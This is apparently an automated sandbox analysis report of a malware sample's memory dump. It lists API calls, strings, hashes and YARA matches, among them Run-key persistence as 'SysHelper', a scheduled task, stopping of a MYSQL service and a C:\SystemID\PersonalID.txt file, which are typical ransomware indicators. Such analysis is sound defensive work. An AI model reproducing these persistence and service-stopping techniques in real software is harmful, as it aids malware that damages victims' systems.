                                                                                                        • Instruction ID: a8f0920c281c0871dda94bb2c9981eaa46c4691646094da2b1f99a2ca36b82a9
                                                                                                        • Opcode Fuzzy Hash: 47e769d4d4bcdcbf82e9d4f804837306c6f4fdbe753364fc72aa05533c98b2d6
                                                                                                        • Instruction Fuzzy Hash: 11C1C1719083509FDB20DF24EC4575ABBE4FF85324F144A1DF888872A1D77A9908EF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DecodePointer_write_multi_char_write_string$__aulldvrm__cftof_free_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 559064418-0
                                                                                                        • Opcode ID: 6fcdf23a878520b68f5e2ac10ebc73bfc0f04afa7bc56d338253b712e7ca9e10
                                                                                                        • Instruction ID: 8b8a3ee31fa915432fedd2b324ac8516524d93282240d1a6356e318bb2f8db2d
                                                                                                        • Opcode Fuzzy Hash: 6fcdf23a878520b68f5e2ac10ebc73bfc0f04afa7bc56d338253b712e7ca9e10
                                                                                                        • Instruction Fuzzy Hash: 23B180B1D093299FEF35AB68CC88BA9B7B5EF54330F1400D9E808A6251D7359E80EF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • DecodePointer.KERNEL32 ref: 00F37B29
                                                                                                        • _free.LIBCMT ref: 00F37B42
                                                                                                          • Part of subcall function 00F30BED: HeapFree.KERNEL32(00000000,00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C13
                                                                                                        • _free.LIBCMT ref: 00F37B55
                                                                                                        • _free.LIBCMT ref: 00F37B73
                                                                                                        • _free.LIBCMT ref: 00F37B85
                                                                                                        • _free.LIBCMT ref: 00F37B96
                                                                                                        • _free.LIBCMT ref: 00F37BA1
                                                                                                        • _free.LIBCMT ref: 00F37BC5
                                                                                                        • EncodePointer.KERNEL32(00C12AF8), ref: 00F37BCC
                                                                                                        • _free.LIBCMT ref: 00F37BE1
                                                                                                        • _free.LIBCMT ref: 00F37BF7
                                                                                                        • _free.LIBCMT ref: 00F37C1F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3064303923-0
                                                                                                        • Opcode ID: 2ba2e7214999c4a92e6f044d206038bac7ef0c4fe9051adff1685b497b34762e
                                                                                                        • Instruction ID: c312eb09095d4551ab8565c947c6113b549d8ce2162e312941319d55b9e89563
                                                                                                        • Opcode Fuzzy Hash: 2ba2e7214999c4a92e6f044d206038bac7ef0c4fe9051adff1685b497b34762e
                                                                                                        • Instruction Fuzzy Hash: 47216DB19093949BCA316F55BC80919BB64BB84374B64403AF884A735CCF7E6840EF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F21BB0
                                                                                                        • CoCreateInstance.OLE32(00FDE908,00000000,00000001,00FDD568,00000000), ref: 00F21BC8
                                                                                                        • CoUninitialize.OLE32 ref: 00F21BD0
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00F21C12
                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00F21C22
                                                                                                        • lstrcatW.KERNEL32(?,01010050), ref: 00F21C3A
                                                                                                        • lstrcatW.KERNEL32(?), ref: 00F21C44
                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00F21C68
                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00F21C7A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                        • String ID: \shell32.dll
                                                                                                        • API String ID: 679253221-3783449302
                                                                                                        • Opcode ID: f6e248e342b9b963de36c9bb4af6f989498c5211f946b3813b305cc201bb4834
                                                                                                        • Instruction ID: 30c74240205f41e6d46313149c69317219a2e44cb95582b786fb5713fd057c2e
                                                                                                        • Opcode Fuzzy Hash: f6e248e342b9b963de36c9bb4af6f989498c5211f946b3813b305cc201bb4834
                                                                                                        • Instruction Fuzzy Hash: 58415A75A8021DAFDB20CBA4DC88FEA7BBDAF48704F004599B505EB190D6B1AA45DB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000001,?,00F64B72), ref: 00F649C7
                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F649D7
                                                                                                        • GetDesktopWindow.USER32 ref: 00F649FB
                                                                                                        • GetProcessWindowStation.USER32(?,00F64B72), ref: 00F64A01
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F64B72), ref: 00F64A1C
                                                                                                        • GetLastError.KERNEL32(?,00F64B72), ref: 00F64A2A
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F64B72), ref: 00F64A65
                                                                                                        • _wcsstr.LIBCMT ref: 00F64A8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                        • Opcode ID: 7c38936635e6e1d69c2833bcc051200f635587ed7ceb041c4fc5ff8e5b72297b
                                                                                                        • Instruction ID: d12527e4c9df7372a083a5fb36762317bc3eded651f8df3ce0e17ca1b69cceb0
                                                                                                        • Opcode Fuzzy Hash: 7c38936635e6e1d69c2833bcc051200f635587ed7ceb041c4fc5ff8e5b72297b
                                                                                                        • Instruction Fuzzy Hash: F431A631A40109ABDB20EFF9EC46AAE77B9EF44730F104256E856D71D0EB35A900EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F4,00F64C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00F6480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00F61D37,00000000,00F1CDAE,00000001,00000001), ref: 00F64AFA
                                                                                                        • GetFileType.KERNEL32(00000000,?,00F61D37,00000000,00F1CDAE,00000001,00000001), ref: 00F64B05
                                                                                                        • __vfwprintf_p.LIBCMT ref: 00F64B27
                                                                                                          • Part of subcall function 00F3BDCC: _vfprintf_helper.LIBCMT ref: 00F3BDDF
                                                                                                        • vswprintf.LIBCMT ref: 00F64B5D
                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00F64B7E
                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00F64BA2
                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00F64BA9
                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00F64BD3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                        • API String ID: 277090408-1348657634
                                                                                                        • Opcode ID: 02ea8b858052c910c91374766f6f5ebd5fb0c3304f6452f3dd868617c642f063
                                                                                                        • Instruction ID: 93c3aa9506c13b864dddd1dbbf36cdf5fb464dc2e1000ac5dd6295d8db3a6bb0
                                                                                                        • Opcode Fuzzy Hash: 02ea8b858052c910c91374766f6f5ebd5fb0c3304f6452f3dd868617c642f063
                                                                                                        • Instruction Fuzzy Hash: C121D771648345ABE730AB70CC4BFEF7799AF88710F44481AB699C61D0EAB99440E793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F22389
                                                                                                        • _memset.LIBCMT ref: 00F223B6
                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00F223DE
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F223E7
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F223F4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F223FF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2240E
                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00F22422
                                                                                                        Strings
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00F2237F
                                                                                                        • SysHelper, xrefs: 00F223D6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                        • API String ID: 122392481-4165002228
                                                                                                        • Opcode ID: f709b923e41ae361e6cf431d35e768d254ad2e48f92c1666c2427fe2d9a4939b
                                                                                                        • Instruction ID: 01b89c7d327f8ae033cc4b462486e54cdd87e573019fbe052350716fa5590393
                                                                                                        • Opcode Fuzzy Hash: f709b923e41ae361e6cf431d35e768d254ad2e48f92c1666c2427fe2d9a4939b
                                                                                                        • Instruction Fuzzy Hash: 77112C7194021DBBDF10DFA0DC49FEE77BDBB04705F0045A6B549E2151DBB45A84EB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 1077091919-0
                                                                                                        • Opcode ID: b81c2413aa2c586c542bbea3ec346c9ca293906e89016a6327b1bd20237b9813
                                                                                                        • Instruction ID: 0c5496a13978757359c5b6260b0ff0c859be72b1c8090643f8f5cb349d7334c9
                                                                                                        • Opcode Fuzzy Hash: b81c2413aa2c586c542bbea3ec346c9ca293906e89016a6327b1bd20237b9813
                                                                                                        • Instruction Fuzzy Hash: 7941C432904704AFDB11AFA4DC86B9E77E5AF84734F20402EF51497142DB7EA645EB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: fbc77cc498550a4e3b731c30b74669f6a252f715d9748c97d8d979bca2ca3e70
                                                                                                        • Instruction ID: d7bf4ca59df457ff9de56cc0a9956e3a2c1ef74ac485965436c57af47d027377
                                                                                                        • Opcode Fuzzy Hash: fbc77cc498550a4e3b731c30b74669f6a252f715d9748c97d8d979bca2ca3e70
                                                                                                        • Instruction Fuzzy Hash: 6CC1B071701215DFDB18CF08EC81A6E77A6EF44794B24892DE891CB381CB30ED56AB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F1DAEB
                                                                                                        • CoCreateInstance.OLE32(00FE4F6C,00000000,00000001,00FE4F3C,?,?,00FDA948,000000FF), ref: 00F1DB0B
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F1DBD6
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00FDA948,000000FF), ref: 00F1DBE3
                                                                                                        • _memset.LIBCMT ref: 00F1DC38
                                                                                                        • CoUninitialize.OLE32 ref: 00F1DC92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                        • API String ID: 330603062-1376107329
                                                                                                        • Opcode ID: e1ca6ccea7ad904deff4a24e26981ede46dfca476443831359ed518e762aa264
                                                                                                        • Instruction ID: 2a3d67a021bd9c038f1a102111cc0df72660fb74c6058a3e2261f8a81c2ab9b1
                                                                                                        • Opcode Fuzzy Hash: e1ca6ccea7ad904deff4a24e26981ede46dfca476443831359ed518e762aa264
                                                                                                        • Instruction Fuzzy Hash: C2512370A4024AAFCB00DF94CC89FAE77B9FF88B05F108558F505AB290DBB5A945CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00F21A1D
                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00F21A32
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00F21A46
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F21A5B
                                                                                                        • Sleep.KERNEL32(?), ref: 00F21A75
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F21A80
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F21A9E
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F21AA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                        • String ID: MYSQL
                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                        • Opcode ID: 9f27b672c6d181d0f8dadcacaea404517138a15070b0b70f1f7089d5189e4ea5
                                                                                                        • Instruction ID: 296adc52c1f3977133143141c60b69fc08ffe2f58aadd0bf8e7576d3914ed272
                                                                                                        • Opcode Fuzzy Hash: 9f27b672c6d181d0f8dadcacaea404517138a15070b0b70f1f7089d5189e4ea5
                                                                                                        • Instruction Fuzzy Hash: AB11A331E0221AABDB205BA4AC4DFAF7BBDEB45761F040111FA00E6140D728D945EEE4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F27F
                                                                                                          • Part of subcall function 00F40CFC: std::exception::_Copy_str.LIBCMT ref: 00F40D15
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F294
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,?,0101793C,?,?,?,?,?,00F33B9C,?,0101793C,?,00000001), ref: 00F40F1F
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F2AD
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F2C2
                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 00F5F2D4
                                                                                                          • Part of subcall function 00F5EF74: std::exception::exception.LIBCMT ref: 00F5EF8E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F2E2
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F2FB
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F310
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                        • String ID: bad function call
                                                                                                        • API String ID: 2464034642-3612616537
                                                                                                        • Opcode ID: e4fac89b28dabec3e28cab50afafde193179077a10228d70422e9c61ce6a2491
                                                                                                        • Instruction ID: 9a099d38b344b3b62c2b57f211a8aba58068a6a026cd89a340a61fa55a37eec2
                                                                                                        • Opcode Fuzzy Hash: e4fac89b28dabec3e28cab50afafde193179077a10228d70422e9c61ce6a2491
                                                                                                        • Instruction Fuzzy Hash: E211EC74D0020DBBCF00EFA5C985CDDBBBCEA04344B448566BE2497546EB78A3199B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00F754C8
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F754D4
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00F754F7
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F75503
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00F75531
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00F7555B
                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00F755F5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                        • Opcode ID: ee9d1049d0c09f2ee7a9d3dc21bfb0b9655a17dd22ea2bb4a59da9fac41658b8
                                                                                                        • Instruction ID: 22b2f07c215128af157ef7dd4bfa2f0f1ba972c4860f84bb43b63572117e5cb7
                                                                                                        • Opcode Fuzzy Hash: ee9d1049d0c09f2ee7a9d3dc21bfb0b9655a17dd22ea2bb4a59da9fac41658b8
                                                                                                        • Instruction Fuzzy Hash: 2C514B31E40609BBEB206B648C03FBF776AAF45B20F044167FE05AB1D1D6A59D05A6A3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F30FDD: __wfsopen.LIBCMT ref: 00F30FE8
                                                                                                        • _fgetws.LIBCMT ref: 00F1C7BC
                                                                                                        • _memmove.LIBCMT ref: 00F1C89F
                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00F1C94B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        • API String ID: 2864494435-54166481
                                                                                                        • Opcode ID: eccf11d53dc3f027425859f2223b57ccaa3f282eed969ce5c0beff81be41b7dc
                                                                                                        • Instruction ID: 80bfc551ae72081752f6e4119e2ae9157c68cfd90c6f2fce0caf7e9b0a2dc098
                                                                                                        • Opcode Fuzzy Hash: eccf11d53dc3f027425859f2223b57ccaa3f282eed969ce5c0beff81be41b7dc
                                                                                                        • Instruction Fuzzy Hash: E091E272D403199BDF21DFA4CC817EEB7B4AF04324F140529E805A3241E779AE84EBE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 00F1F338
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F1F353
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                        • Opcode ID: 00af3a5871eb09f0de44c7be120960b27bb35bf3901a47f75abef459971247f1
                                                                                                        • Instruction ID: 0636d4fdd06ca84606823be8b7111837fd1533d08c5ea2b1429f231e77a3ea0f
                                                                                                        • Opcode Fuzzy Hash: 00af3a5871eb09f0de44c7be120960b27bb35bf3901a47f75abef459971247f1
                                                                                                        • Instruction Fuzzy Hash: 15C15971D01219EBDF00DFA4DD8ABDEBBB5BF14308F144029E405AB250EB79AA58DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
